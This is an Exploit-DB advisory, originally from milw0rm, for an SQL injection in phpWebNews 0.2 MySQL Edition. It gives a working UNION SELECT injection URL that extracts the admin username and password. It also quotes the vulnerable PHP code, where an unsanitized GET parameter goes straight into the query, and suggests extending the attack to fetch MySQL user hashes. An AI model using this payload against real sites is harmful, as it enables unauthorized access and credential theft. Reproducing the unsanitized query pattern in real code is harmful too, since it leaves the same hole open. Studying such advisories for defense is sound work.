phpWebNews 0.2 MySQL Edition id_kat SQL Injection Vulnerability

2008-07-03T00:00:00
ID EDB-ID:5998
Type exploitdb
Reporter storm
Modified 2008-07-03T00:00:00

Description

phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability. CVE-2008-6813. Webapps exploit for php platform

                                        
                                              ____       _   _       _ ___   __                        _  __
 / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
 \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm


phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online)
SQL Injection


SQL Injection
-------------

index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--


$id_kat=$_GET[id_kat];			  
$m_conn = db_connect();
if ((empty($id_kat))||($id_kat==''))
	$m_sql = "select * from berita where status='tampil' and order by tgl desc";
else
	$m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc";


Here, we have a classic SQL MySQL injection.  The GET variable "id_kat" isn't sanitized before being passed to the query.  By injecting our string, the query becomes:

select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc

The comment renders the rest of the query to be useless.  We are effectively grabbing the first user from the table "user", which is the admin.  You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply.

# milw0rm.com [2008-07-03]